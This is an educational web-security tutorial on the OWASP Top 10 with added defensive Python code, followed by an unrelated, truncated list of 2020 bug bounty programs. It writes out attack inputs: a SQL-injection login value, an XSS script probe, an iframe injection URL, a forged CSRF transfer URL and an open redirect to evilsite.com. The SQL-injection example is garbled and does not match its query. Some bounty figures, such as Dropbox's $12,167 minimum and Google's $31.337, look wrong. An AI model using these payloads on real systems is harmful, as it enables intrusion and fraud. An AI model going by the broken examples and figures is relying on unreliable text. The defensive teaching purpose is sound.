The organization publishes a list of top web security vulnerabilities based on the data from various security organizations.

The web security vulnerabilities are prioritized depending on exploitability, detectability and impact on software.

  • Exploitability –
    What is needed to exploit the security vulnerability? Exploitability is highest when the attack needs only a web browser and lowest when it needs advanced programming and tools.

  • Detectability –
    How easy is it to detect the threat? Detectability is highest when the information is displayed in a URL, form or error message and lowest when it is only visible in source code.

  • Impact or Damage –
    How much damage will be done if the security vulnerability is exposed or attacked? Impact is highest for a complete system crash and lowest when nothing happens at all.

The main aim of OWASP Top 10 is to educate the developers, designers, managers, architects and organizations about the most important security vulnerabilities.

The Top 10 security vulnerabilities as per OWASP Top 10 are:

SQL Injection


Description

Injection is a security vulnerability that allows an attacker to alter backend SQL statements by manipulating the user-supplied data.

Injection occurs when user input is sent to an interpreter as part of a command or query and tricks the interpreter into executing unintended commands, giving access to unauthorized data.

The SQL command, when executed by the web application, can also expose the back-end database.

Implication

  • An attacker can inject malicious content into the vulnerable fields.

  • Sensitive data like User Names, Passwords, etc. can be read from the database.

  • Database data can be modified (Insert/Update/ Delete).

  • Administration operations can be executed on the database.

Vulnerable Objects

  • Input Fields

  • URLs interacting with the database.

Examples:

  • SQL injection on the Login Page

Logging into an application without having valid credentials.

A valid user name is available, but the password is not.

Test URL: http://demo.testfire.net/default.aspx

User Name: sjones

Password: 1=1' or pass123

The SQL query created and sent to the interpreter is shown below (the user-supplied values are concatenated directly into the statement):

SELECT * FROM Users WHERE User_Name = sjones AND Password = 1=1' or pass123;

Recommendations

  1. Whitelist the input fields (accept only known-good values).

  2. Avoid displaying detailed error messages that are useful to an attacker.
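The login example above, worked through as an added example (not code from the original page): the vulnerable version concatenates the user name and password straight into the statement, exactly as the query shown above is built, while the hardened version applies the two recommendations, a whitelist on the user-name field and a parameterized query. The in-memory SQLite table, the account's password and the regular expression are constructed for this demonstration; a real application would store a password hash rather than the password itself (see the Insecure Cryptographic Storage section below).

```python
import re
import sqlite3

# Constructed in-memory stand-in for the application's Users table from the example above.
# (A real application stores a password hash, not the password itself.)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE Users (User_Name TEXT, Password TEXT)")
conn.execute("INSERT INTO Users VALUES ('sjones', 'correct-horse-battery')")
conn.commit()

# Whitelist for the user-name field: letters, digits, dot, underscore, hyphen; 1-32 characters.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

# The classic always-true fragment behind the "1=1" idea in the example above.
TAUTOLOGY = "' OR '1'='1"


def vulnerable_statement(user_name: str, password: str) -> str:
    """The statement the interpreter actually receives when input is concatenated into SQL."""
    return ("SELECT * FROM Users WHERE User_Name = '" + user_name + "' "
            "AND Password = '" + password + "'")


def login_vulnerable(user_name: str, password: str) -> bool:
    """Whatever the user types becomes part of the SQL text."""
    return conn.execute(vulnerable_statement(user_name, password)).fetchone() is not None


def login_safe(user_name: str, password: str) -> bool:
    """Whitelists the user name, then binds both values as parameters: input is data, never SQL."""
    if not USERNAME_RE.match(user_name):
        return False
    query = "SELECT * FROM Users WHERE User_Name = ? AND Password = ?"
    return conn.execute(query, (user_name, password)).fetchone() is not None


if __name__ == "__main__":
    print(vulnerable_statement("sjones", TAUTOLOGY))
    print("vulnerable login, injected password :", login_vulnerable("sjones", TAUTOLOGY))
    print("parameterized login, same input     :", login_safe("sjones", TAUTOLOGY))
    print("parameterized login, real password  :", login_safe("sjones", "correct-horse-battery"))
```

The printed statement makes the problem visible: the closing quote in the injected value ends the Password literal early and the OR clause makes the WHERE condition true for every row, so the vulnerable login succeeds without the password. With parameters the same text is compared as a literal password value and the login fails, and the whitelist rejects any user name containing a quote or comment marker before it reaches the database at all.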

Cross Site Scripting

Description

Cross Site Scripting is also known for short as XSS.

XSS vulnerabilities target scripts embedded in a page that are executed on the client side, i.e. in the user's browser, rather than on the server side. These flaws can occur when the application takes untrusted data and sends it to the web browser without proper validation.

Attackers can use XSS to execute malicious scripts in the browsers of the users, in this case the victims. Since the browser cannot know whether the script is trustworthy or not, the script will be executed, and the attacker can hijack session cookies, deface websites, or redirect the user to unwanted and malicious websites.

XSS is an attack which allows the attacker to execute scripts in the victim's browser.

Implication:

  • By making use of this security vulnerability, an attacker can inject scripts into the application, steal session cookies, deface websites, and run malware on the victims' machines.

Vulnerable Objects

  • Input Fields

  • URLs

Examples

1. http://www.vulnerablesite.com/home?"<script>alert("xss")</script>

When the above URL is opened in a browser, a message box will be displayed if the site is vulnerable to XSS.

A more serious attack can be carried out if the attacker wants to display or steal the session cookie.

2. http://demo.testfire.net/search.aspx?txtSearch <iframe> <src = http://google.com width = 500 height 500></iframe>

When the above URL is opened, the browser will load an invisible frame pointing to http://google.com.

The attack can be made more serious by running a malicious script in the browser.

Recommendations

  1. Whitelist input fields

  2. Input and output encoding
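Recommendation 2, output encoding, as an added example (not code from the original page): a search page that reflects the query term. The unsafe renderer writes the term into HTML verbatim, so the `<script>alert("xss")</script>` probe from example 1 above becomes live markup; the safe renderer encodes the term for each output context it lands in (element text, a quoted attribute, and a URL query component). The search term and the HTML template are constructed for this demonstration.

```python
import html
from urllib.parse import quote

# Constructed inputs: an ordinary search term and the probe from example 1 above.
BENIGN = "security books"
PROBE = '<script>alert("xss")</script>'


def render_results_unsafe(term: str) -> str:
    """Reflects the search term into HTML verbatim; a browser treats any tags in it as markup."""
    return f"<p>Results for {term}</p>"


def render_results_safe(term: str) -> str:
    """Encodes the term separately for each output context it is written into."""
    body_text = html.escape(term)                # & < > " ' become entities in element text
    attr_value = html.escape(term, quote=True)   # same, and safe inside a double-quoted attribute
    url_param = quote(term, safe="")             # percent-encoded for a URL query component
    return (
        f"<p>Results for {body_text}</p>"
        f'<input type="text" name="q" value="{attr_value}">'
        f'<a href="/search?q={url_param}">permalink</a>'
    )


def contains_live_tag(rendered: str) -> bool:
    """Detection check: does the rendered page still contain an unencoded <script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe:", render_results_unsafe(PROBE))
    print("safe  :", render_results_safe(PROBE))
```

The encoded page still displays the probe text to the user but as inert characters (`&lt;script&gt;...`), which is the point of output encoding: the data is preserved, the markup is not. Encoding is context-specific, so a value placed inside a JavaScript block or a CSS value needs its own encoder rather than `html.escape`.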

Broken Authentication and Session Management

Description

Websites usually create a session cookie and session ID for each valid session, and these cookies contain sensitive data like username, password, etc. When the session is ended, either by logout or by the browser being closed abruptly, these cookies should be invalidated, i.e. for each session there should be a new cookie.

If the cookies are not invalidated, the sensitive data will remain on the system. For example, when a user uses a public computer (cyber cafe), the cookies of the vulnerable site remain on the system, exposed to an attacker. If an attacker uses the same public computer some time later, the sensitive data is compromised.

In the same manner, a user on a public computer closes the browser abruptly instead of logging off. When an attacker uses the same system and browses to the same vulnerable site, the victim's previous session will be opened. The attacker can then do whatever he wants, from stealing profile information to stealing credit card information, etc.

A check should be done to find the strength of the authentication and session management. Keys, session tokens and cookies should be implemented properly without compromising passwords.

Vulnerable Objects

  • Session IDs exposed in the URL can lead to a session fixation attack.

  • Session IDs are the same before and after logout and login.

  • Session timeouts are not implemented correctly.

  • The application assigns the same session ID for each new session.

  • Authenticated parts of the application are not protected using SSL, and passwords are not stored in hashed or encrypted format.

  • The session can be reused by a low-privileged user.

Implication

  • By making use of this vulnerability, an attacker can hijack a session and gain unauthorized access to the system, which allows disclosure and modification of unauthorized information.

  • Sessions can be hijacked using stolen cookies, or session IDs can be stolen using XSS.

Examples

  1. An airline reservation application supports URL rewriting, putting session IDs in the URL:
    http://Examples.com/sale/saleitems;jsessionid=2P0OC2oJM0DPXSNQPLME34SERTBG/dest=Maldives (Sale of tickets to Maldives)
    An authenticated user of the site wants to let his friends know about the sale and sends the link in an email. The friends receive the session ID, which can be used to make unauthorized modifications or misuse the saved credit card details.

  2. An application is vulnerable to XSS, by which an attacker can access the session ID, which can then be used to hijack the session.

  3. Application timeouts are not set properly. The user uses a public computer, closes the browser instead of logging off and walks away. The attacker uses the same browser some time later, and the session is still authenticated.

Recommendations

  1. All the authentication and session management requirements should be defined as per OWASP Application Security Verification Standard.

  2. Never expose any credentials in URLs or Logs.

  3. Strong efforts should also be made to avoid XSS flaws, which can be used to steal session IDs.
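Session handling that avoids the vulnerable objects listed above, as an added example (not code from the original page): a server-side session store whose IDs are random, rotated at login so a pre-planted ID never becomes an authenticated one, invalidated on the server at logout, and dropped after an idle timeout. The browser holds only the opaque ID; user data stays on the server. The 15-minute timeout and the injectable clock are assumptions made for this demonstration.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT_SECONDS = 15 * 60   # assumption: sessions expire after 15 minutes without activity


@dataclass
class Session:
    user: str
    last_seen: float


class SessionStore:
    """Server-side session store.

    The browser only ever holds an opaque random ID; user data stays on the server.
    IDs are rotated at login, removed at logout and dropped after the idle timeout.
    The clock is injectable so the timeout can be exercised without waiting.
    """

    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    def login(self, user: str, presented_session_id: Optional[str] = None) -> str:
        # Whatever ID the browser presented before authenticating is discarded, so an ID
        # planted in a URL or cookie beforehand (session fixation) never becomes authenticated.
        if presented_session_id:
            self._sessions.pop(presented_session_id, None)
        new_id = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG; not guessable
        self._sessions[new_id] = Session(user=user, last_seen=self._clock())
        return new_id

    def current_user(self, session_id: str) -> Optional[str]:
        """Resolve a cookie value to a user, enforcing the idle timeout on every request."""
        session = self._sessions.get(session_id)
        if session is None:
            return None
        if self._clock() - session.last_seen > IDLE_TIMEOUT_SECONDS:
            del self._sessions[session_id]          # expired server-side; the cookie is now useless
            return None
        session.last_seen = self._clock()
        return session.user

    def logout(self, session_id: str) -> None:
        """Invalidate on the server, not merely clear the cookie in the browser."""
        self._sessions.pop(session_id, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("sjones", presented_session_id="id-chosen-before-login")
    print("logged in as:", store.current_user(sid))
    store.logout(sid)
    print("after logout:", store.current_user(sid))
```

Because the session lives on the server, the public-computer scenario in example 3 above ends at the timeout even if the browser kept the cookie, and the logout removes the session rather than relying on the browser to forget it. The cookie carrying the ID should additionally be sent with the Secure and HttpOnly flags and never appear in a URL.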

Insecure Direct Object References

Description

It occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key, in a URL or as a form parameter. The attacker can use this information to access other objects and can craft further attacks to access unauthorized data.

Implication

  • Using this vulnerability, an attacker can gain access to unauthorized internal objects, modify data or compromise the application.

Vulnerable Objects

  • In the URL.

Examples:

Changing "userid" in the following URL can allow an attacker to view another user's information.

http://www.vulnerablesite.com/userid=123 Modified to http://www.vulnerablesite.com/userid=124

An attacker can view other users' information by changing the user id value.

Recommendations:

  1. Implement access control checks.

  2. Avoid exposing object references in URLs.

  3. Verify authorization for all referenced objects.
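The three recommendations above, as an added example (not code from the original page): an access control check performed on every object reference (recommendation 1 and 3) and a per-session indirection map so the client never sees database keys at all (recommendation 2). The records, the users alice/bob/carol and the single admin role are constructed for this demonstration.

```python
import secrets
from typing import Dict, Optional

# Constructed records keyed by the internal database id that the example URL exposes (userid=123).
USER_RECORDS: Dict[int, dict] = {
    123: {"owner": "alice", "email": "alice@example.com"},
    124: {"owner": "bob", "email": "bob@example.com"},
}
ADMINS = {"carol"}   # assumption: a single admin role that may read any record


def get_user_record_unchecked(requested_id: int) -> Optional[dict]:
    """The vulnerable pattern: trusts the id taken from the URL and returns whatever it points at."""
    return USER_RECORDS.get(requested_id)


def get_user_record(current_user: str, requested_id: int) -> Optional[dict]:
    """Authorization check on every reference: the record's owner or an admin, otherwise nothing.

    A denied request returns the same None as a missing record, so an attacker cannot tell
    'exists but not yours' from 'does not exist' and enumerate ids.
    """
    record = USER_RECORDS.get(requested_id)
    if record is None:
        return None
    if record["owner"] != current_user and current_user not in ADMINS:
        return None
    return record


class IndirectReferenceMap:
    """Per-session indirection: the client is handed random handles, never database ids."""

    def __init__(self) -> None:
        self._handles: Dict[str, int] = {}

    def handle_for(self, db_id: int) -> str:
        handle = secrets.token_urlsafe(16)
        self._handles[handle] = db_id
        return handle

    def resolve(self, handle: str) -> Optional[int]:
        return self._handles.get(handle)


def view_profile(current_user: str, handle: str, refs: IndirectReferenceMap) -> Optional[dict]:
    """Request path using both defences: handle -> id via the session map, then the ownership check."""
    db_id = refs.resolve(handle)
    if db_id is None:
        return None
    return get_user_record(current_user, db_id)


if __name__ == "__main__":
    refs = IndirectReferenceMap()
    handle = refs.handle_for(123)
    print("alice via handle:", view_profile("alice", handle, refs))
    print("bob via same handle:", view_profile("bob", handle, refs))
```

Indirection alone is not enough (a handle leaked in a URL is still a reference), which is why `view_profile` still runs the ownership check after resolving the handle; the two measures address different failure modes.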

Cross Site Request Forgery

Description

Cross Site Request Forgery is a forged request that comes from a different (cross) site.

A CSRF attack occurs when a malicious website, email, or program causes a user's browser to perform an unwanted action on a trusted site for which the user is currently authenticated.

A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application.

The attacker sends a link to the victim; when the user clicks on the URL while logged into the original website, the forged request is carried out with the victim's privileges and data can be stolen from the website.

Implication

  • Using this vulnerability, an attacker can change user profile information, change status, create a new user on the admin's behalf, etc.

Vulnerable Objects

  • User Profile page

  • User account forms

  • Business transaction page

Examples

The victim is logged into a bank website using valid credentials. He receives mail from an attacker saying "Please click here to donate $1 to cause."

When the victim clicks on it, a valid request will be created to donate $1 to a particular account.

http://www.vulnerablebank.com/transfer.do?account=cause&amount=1

The attacker captures this request, creates the request below and embeds it in a button saying "I Support Cause."

http://www.vulnerablebank.com/transfer.do?account=Attacker&amount=1000

Since the session is authenticated and the request appears to come through the bank website, the server would transfer $1000 to the attacker.

Recommendation

  1. Mandate the user's presence while performing sensitive actions.

  2. Implement mechanisms like CAPTCHA, re-authentication, and unique request tokens.
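The "unique request tokens" recommendation applied to the transfer example above, as an added example (not code from the original page): the server issues one unpredictable token per session when it renders the transfer form, and the transfer handler rejects any request that is not a POST, that carries an Origin header from another site, or whose token does not match. The site origin is taken from the example URLs; the session id, form fields and in-memory token store are constructed for this demonstration.

```python
import hmac
import secrets
from typing import Dict

SITE_ORIGIN = "https://www.vulnerablebank.com"     # origin of the example site above
CSRF_TOKENS: Dict[str, str] = {}                   # session id -> token, kept server-side


def issue_csrf_token(session_id: str) -> str:
    """Called when the transfer form is rendered: one unpredictable token per session,
    placed in a hidden form field. A page on another origin cannot read it."""
    token = secrets.token_urlsafe(32)
    CSRF_TOKENS[session_id] = token
    return token


def transfer(method: str, session_id: str, form: Dict[str, str], headers: Dict[str, str]) -> str:
    """State-changing handler with three checks: POST only (a plain link cannot trigger it),
    the Origin header must be our own site when a browser sends one, and the synchronizer
    token must match the session's token (compared in constant time)."""
    if method != "POST":
        return "rejected: state changes require POST"
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-origin request"
    expected = CSRF_TOKENS.get(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return "rejected: missing or invalid CSRF token"
    return f"transferred ${form['amount']} to {form['account']}"


if __name__ == "__main__":
    sid = "session-of-victim"                      # constructed session id
    token = issue_csrf_token(sid)
    print(transfer("POST", sid, {"csrf_token": token, "account": "cause", "amount": "1"},
                   {"Origin": SITE_ORIGIN}))
    print(transfer("GET", sid, {"account": "Attacker", "amount": "1000"}, {}))
```

The forged request in the example above fails on every check: it arrives as a GET from a link, any browser that sends an Origin header reports the attacker's page, and it cannot include a token the attacker's page was never able to read. The `SameSite` cookie attribute is a complementary browser-side control, but the server-side token is what makes the defence independent of client behaviour.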

Security Misconfiguration

Description

Security configuration must be defined and deployed for the application, frameworks, application server, web server, database server, and platform. If these are not properly configured, an attacker can gain unauthorized access to sensitive data or functionality.

Sometimes such flaws result in complete system compromise. Keeping the software up to date is also part of good security.

Implication

  • By making use of this vulnerability, the attacker can enumerate the underlying technology, application server version information and database information, and gather information about the application in order to mount further attacks.

Vulnerable objects

  • URL

  • Form Fields

  • Input fields

Examples

  1. The application server admin console is automatically installed and not removed. Default accounts are not changed. The attacker can log in with default passwords and gain unauthorized access.

  2. Directory listing is not disabled on your server. An attacker discovers this and can simply list directories to find any file.

Recommendations

  1. A strong application architecture that provides good separation and security between the components.

  2. Change default usernames and passwords.

  3. Disable directory listings and implement access control checks.

Insecure Cryptographic Storage

Description

Insecure cryptographic storage is a common vulnerability which exists when sensitive data is not stored securely.

User credentials, profile information, health details, credit card information, etc. count as sensitive data on a website.

This data will be stored in the application database. When this data is stored improperly, without using encryption or hashing*, it will be vulnerable to attackers.

(*Hashing is the transformation of a string of characters into a shorter string of fixed length, or a key. To verify the string later, the algorithm used to form the key must be available.)

Implication

  • By using this vulnerability, an attacker can steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes.

Vulnerable objects

  • Application database.

Examples

In one banking application, the password database uses unsalted hashes* to store everyone's passwords. An SQL injection flaw allows the attacker to retrieve the password file. All the unsalted hashes can be brute forced in no time, whereas the salted passwords would take thousands of years.

(*Unsalted hashes – Salt is random data appended to the original data. The salt is appended to the password before hashing.)

Recommendations

  1. Ensure appropriate, strong standard algorithms are used. Do not create your own cryptographic algorithms. Use only approved public algorithms such as AES, RSA public key cryptography, and SHA-256, etc.

  2. Ensure offsite backups are encrypted, but that the keys are managed and backed up separately.
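The unsalted-versus-salted contrast from the example above, as an added example (not code from the original page): the weak scheme gives every user with the same password the same hash, while the salted scheme combines a per-user random salt with PBKDF2-HMAC-SHA256, a standard slow key-derivation function, and stores salt and iteration count next to the digest so they can be raised later. The 600,000 iteration count is an assumption for this demonstration and should be tuned to the deployment hardware.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000   # assumption: PBKDF2-HMAC-SHA256 work factor; raise it as hardware gets faster


def hash_unsalted(password: str) -> str:
    """The weak scheme from the example: identical passwords give identical hashes, so one
    precomputed table or one cracked hash covers every user who chose that password."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = ITERATIONS) -> str:
    """Per-user random salt plus a deliberately slow key-derivation function.

    The result is one self-describing string (scheme$iterations$salt$digest), so the
    parameters can be raised later without breaking records already stored.
    """
    salt = salt if salt is not None else os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${derived.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                  bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(derived.hex(), digest_hex)


if __name__ == "__main__":
    # Two users who picked the same password: indistinguishable unsalted, distinct salted.
    print("unsalted, user A:", hash_unsalted("pass123"))
    print("unsalted, user B:", hash_unsalted("pass123"))
    print("salted,   user A:", hash_password("pass123"))
    print("salted,   user B:", hash_password("pass123"))
```

With salted, iterated hashes an attacker who obtains the table through the SQL injection in the example must attack each record separately and pay the full iteration cost per guess, which is what turns "no time" into the "thousands of years" the example describes.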

Failure to restrict URL Access

Description

Web applications check URL access rights before rendering protected links and buttons. Applications need to perform similar access control checks each time these pages are accessed.

In most applications, the privileged pages, locations and resources are not presented to unprivileged users.

By an intelligent guess, an attacker can access privileged pages. An attacker can access sensitive pages, invoke functions and view confidential information.

Implication

  • By making use of this vulnerability, an attacker can gain access to unauthorized URLs without logging into the application and exploit the vulnerability. An attacker can access sensitive pages, invoke functions and view confidential information.

Vulnerable objects:

  • URLs

Examples

  1. The attacker notices that the URL indicates the role as "/user/getaccounts." He modifies it to "/admin/getaccounts".

  2. An attacker can append a role to the URL.

http://www.vulnerablesite.com can be modified as http://www.vulnerablesite.com/admin

Recommendations

  1. Implement strong access control checks.

  2. Authentication and authorization policies should be role-based.

  3. Restrict access to unwanted URLs.
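The role-based, deny-by-default check from the recommendations above, as an added example (not code from the original page): a route table maps each protected path to the roles allowed to call it, and the check runs on every request after the path is normalized, so the `/user/getaccounts` to `/admin/getaccounts` change from example 1 is refused for a user, and variants like `//admin/` or `/user/../admin/getaccounts` do not slip past. The route table and role names are constructed for this demonstration.

```python
import posixpath
import re
from typing import Dict, Optional, Set

# Constructed route table: each protected path and the roles allowed to call it.
ROUTE_ROLES: Dict[str, Set[str]] = {
    "/user/getaccounts": {"user", "admin"},
    "/admin/getaccounts": {"admin"},
    "/admin": {"admin"},
}
PUBLIC_PATHS = {"/", "/login"}


def normalize_path(raw: str) -> str:
    """Canonical form of a request path: query dropped, repeated slashes collapsed,
    '.' and '..' segments resolved, trailing slash removed."""
    path = raw.split("?", 1)[0] or "/"
    path = re.sub(r"/+", "/", path)
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path if path == "/" else path.rstrip("/")


def authorize(path: str, role: Optional[str]) -> bool:
    """Deny by default: the path must be public or explicitly mapped to the caller's role.
    This runs on every request, not only when deciding which links to render."""
    normalized = normalize_path(path)
    if normalized in PUBLIC_PATHS:
        return True
    if role is None:                 # not logged in
        return False
    allowed = ROUTE_ROLES.get(normalized)
    return allowed is not None and role in allowed


if __name__ == "__main__":
    for path, role in (("/user/getaccounts", "user"), ("/admin/getaccounts", "user"),
                       ("/admin", "admin"), ("/admin", None)):
        print(f"{path!r} as {role!r}: {'allowed' if authorize(path, role) else 'denied'}")
```

Hiding the admin link from the user's page is not a control; the table lookup is. A path that is missing from the table is denied even for an admin, which is the safe failure when a new page is added before anyone has decided who may reach it.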

Insufficient Transport Layer Protection

Description

This deals with the information exchange between the user (client) and the server (application). Applications frequently transmit sensitive information like authentication details, credit card information, and session tokens over a network.

Using weak algorithms, using expired or invalid certificates, or not using SSL can allow the communication to be exposed to untrusted users, which may compromise a web application and/or allow sensitive information to be stolen.

Implication

  • By making use of this web security vulnerability, an attacker can sniff a legitimate user's credentials and gain access to the application.

  • An attacker can steal credit card information.

Vulnerable objects

  • Data sent over the network.

Recommendations

  1. Enable secure HTTP and enforce credential transfer over HTTPS only.

  2. Ensure your certificate is valid and not expired.

Examples:

1. If an application is not using SSL, an attacker can simply monitor network traffic and observe an authenticated victim's session cookie. The attacker can steal that cookie and perform a Man-in-the-Middle attack.

Unvalidated Redirects and Forwards

Description

Web applications use a few methods to redirect and forward users to other pages for an intended purpose.

If there is no proper validation while redirecting to other pages, attackers can make use of this to redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

Implication

  • An attacker can send the user a URL that contains a genuine URL with an encoded malicious URL appended. A user who sees only the genuine part of the attacker-sent URL may browse to it and become a victim.

Examples

1. http://www.vulnerablesite.com/login.aspx?redirectURL=ownsite.com

Modified to

http://www.vulnerablesite.com/login.aspx?redirectURL=evilsite.com

Recommendations

  1. Simply avoid using redirects and forwards in the application. If they are used, do not involve user parameters in calculating the destination.

  2. If the destination parameters can't be avoided, ensure that the supplied value is valid and authorized for the user.
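Recommendation 2 applied to the `redirectURL` parameter from the example above, as an added example (not code from the original page): the login handler accepts only site-relative paths from a fixed allow-list and falls back to a default for anything else, including the `evilsite.com` value, absolute URLs, scheme-relative `//host` forms and the backslash variant browsers read as `//`. The allow-list of landing pages is an assumption made for this demonstration.

```python
from urllib.parse import urlsplit

# Assumption: the only places a post-login redirect may land, as site-relative paths.
ALLOWED_REDIRECT_PATHS = {"/", "/account", "/dashboard"}


def safe_redirect_target(redirect_url: str, default: str = "/") -> str:
    """Validate a 'redirectURL' parameter and return a same-site path, or the default.

    Rejects absolute URLs ('http://evilsite.com'), bare host names ('evilsite.com'),
    scheme-relative forms ('//evilsite.com'), backslash variants ('/\\evilsite.com') that
    browsers read as '//', non-http schemes ('javascript:'), and paths not on the allow-list.
    """
    if not redirect_url:
        return default
    candidate = redirect_url.replace("\\", "/")     # browsers treat '\' like '/', so must we
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:                 # anything with a scheme or a host is foreign
        return default
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return parts.path if parts.path in ALLOWED_REDIRECT_PATHS else default


if __name__ == "__main__":
    for value in ("/dashboard", "ownsite.com", "evilsite.com", "//evilsite.com",
                  "http://evilsite.com/dashboard", "/\\evilsite.com", "javascript:alert(1)"):
        print(f"redirectURL={value!r:32} -> {safe_redirect_target(value)}")
```

Note that the "genuine" value in the example, `ownsite.com`, is also rejected: it is a host name, not a path on this site, and the safe design does not distinguish friendly hosts from hostile ones by name. If redirecting to a second trusted host is a real requirement, compare the parsed host against an explicit allow-list of hosts rather than inspecting the string.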

Top 30 Bug Bounty Programs in 2020

Below is a curated list of bug bounty programs run by reputable companies.

1) Intel

Intel's bounty program mainly targets the company's hardware, firmware, and software.

Limitations: It does not include recent acquisitions, the company's web infrastructure, third-party products, or anything relating to McAfee.

Minimum Payout: Intel offers a minimum amount of $500 for finding bugs in their system.

Maximum Payout: The Company pays $30,000 maximum for detecting critical bugs.

Bounty Link: https://security-center.intel.com/BugBountyProgram.aspx

2) Yahoo

Yahoo has its dedicated team that accepts vulnerability reports from security researchers and ethical hackers.

Limitations: The company does not offer any reward for finding bugs in yahoo.net, Yahoo 7, Yahoo Japan, Onwander and Yahoo-operated WordPress blogs.

Minimum Payout: There is no set minimum payout at Yahoo.

Maximum Payout: Yahoo can pay $15000 for detecting important bugs in their system.

Bounty Link:https://safety.yahoo.com/Security/REPORTING-ISSUES.html

3) Snapchat

Snapchat's security team reviews all vulnerability reports and acts upon them by responsible disclosure. The company will acknowledge your submission within 30 days.

Minimum Payout: Snapchat will pay minimum $2000.

Maximum Payout: Maximum they will pay is $15,000.

Bounty Link:https://support.snapchat.com/en-US/i-need-help

4) Cisco

Cisco encourages individuals or organizations that are experiencing a product security issue to report it to the company.

Minimum Payout: Cisco's minimum payout amount is $100.

Maximum Payout: The company will give a maximum of $2,500 for finding serious vulnerabilities.

Bounty Link: https://www.cisco.com/c/en/us/about/security-center/security-vulnerability-policy.html

5) Dropbox

Dropbox's bounty program allows security researchers to report bugs and vulnerabilities on the third-party service HackerOne.

Minimum Payout: The minimum amount paid is $12,167.

Maximum Payout: The maximum amount offered is $32,768.

Bounty Link: https://www.dropbox.com/help/security/report-vulnerability

6) Apple

When Apple first launched its bug bounty program, it allowed just 24 security researchers. The program then expanded to include more bug bounty hunters.

The company will pay $100,000 to those who can extract data protected by Apple's Secure Enclave technology.

Minimum Payout: There is no minimum amount fixed by Apple Inc.

Maximum payout: The highest bounty given by Apple is $200,000 for security issues affecting its firmware.

Bounty Link: https://support.apple.com/en-au/HT201220

7) Facebook

Under Facebook's bug bounty program users can report a security issue on Facebook, Instagram, Atlas, WhatsApp, etc.

Limitations: There are a few security issues that the social networking platform considers out-of-bounds.

Minimum Payout: Facebook will pay a minimum of $500 for a disclosed vulnerability.

Maximum Payout: There is no upper limit fixed by Facebook for the Payout.

Bounty Link: https://www.facebook.com/whitehat/

8) Google

All content on .google.com, .blogger and youtube.com is open to Google's vulnerability rewards program.

Limitations: This bounty program only covers design and implementation issues.

Minimum Payout: Google will pay a minimum of $300 for finding security threats.

Maximum Payout: Google will pay the highest bounty of $31.337 for normal Google applications.

Bounty Link: https://www.google.com/about/appsecurity/reward-program/

9) Quora

Quora offers Bug Bounty program to all users and researchers to find and report security vulnerabilities.

Minimum Payout: Quora will pay minimum $100 for finding vulnerabilities on their site.

Maximum Payout: Maximum payout offered by this site is $7000.

Bounty Link: https://engineering.quora.com/Security-Bug-Bounty-Program

10) Mozilla

Mozilla rewards for vulnerability discoveries by ethical hackers and security researchers.

Limitations: The bounty is offered only for bugs in Mozilla services, such as Firefox, Thunderbird and other related applications and services.

Minimum Payout: The minimum amount given by Firefox is $500.

Maximum Payout: The Company is paying a maximum of $5000.

Bounty Link: https://www.mozilla.org/en-US/security/bug-bounty/

11) Microsoft

Microsoft's current bug bounty program was officially launched on 23rd September 2014 and deals only with Online Services.

Limitations: The bounty reward is only given for the critical and important vulnerabilities.

Minimum Payout: Microsoft is ready to pay $15,000 for finding critical bugs.

Maximum Payout: The maximum amount can be $250,000.

Bounty Link: https://technet.microsoft.com/en-us/library/dn425036.aspx

12) OpenSSL

OpenSSL bounty allows you to report vulnerabilities using secure email (PGP Key). You can also report vulnerabilities to the OpenSSL Management Committee.

Minimum Payout: The Company pays minimum bounty rewards of $500.

Maximum Payout: The highest amount given by the company is $5000.

Bounty Link: https://www.openssl.org/news/vulnerabilities.html

13) Vimeo

Vimeo welcomes the reporting of any security vulnerability in their products, and the company pays good rewards to the reporter.

Minimum payout: The Company will pay minimum $500

Maximum Payout: The maximum amount paid by this company is $5000.

Bounty Link: https://vimeo.com/about/security

14) Apache

Apache encourages ethical hackers to report security vulnerabilities to one of their private security mailing lists.

Minimum payout: The minimum pay out amount given by Apache is $500.

Maximum Payout: This company can give a maximum reward of $3000.

Bounty Link: https://www.apache.org/security/

15) Twitter

Twitter allows security researchers and experts to report possible security vulnerabilities in their services. The company encourages people to find bugs.

Minimum Payout: Twitter pays a minimum amount of $140.

Maximum Payout: The maximum amount paid by the company is $15000.

Bounty Link: https://support.twitter.com/articles/477159

16) Avast

Avast's bounty program rewards ethical hackers and security researchers for reporting remote code execution, local privilege escalation, DoS, scanner bypass and other issues.

Minimum Payout: Avast can pay you the minimum amount of $400.

Maximum Payout: The maximum amount offered by the company is $10,000.

Bounty Link: https://www.avast.com/bug-bounty

17) Paypal

Payment gateway service Paypal also offers bug bounty programs for security researchers.

Limitations: The following are not eligible:

  • Vulnerabilities dependent upon social engineering techniques

  • Host header issues

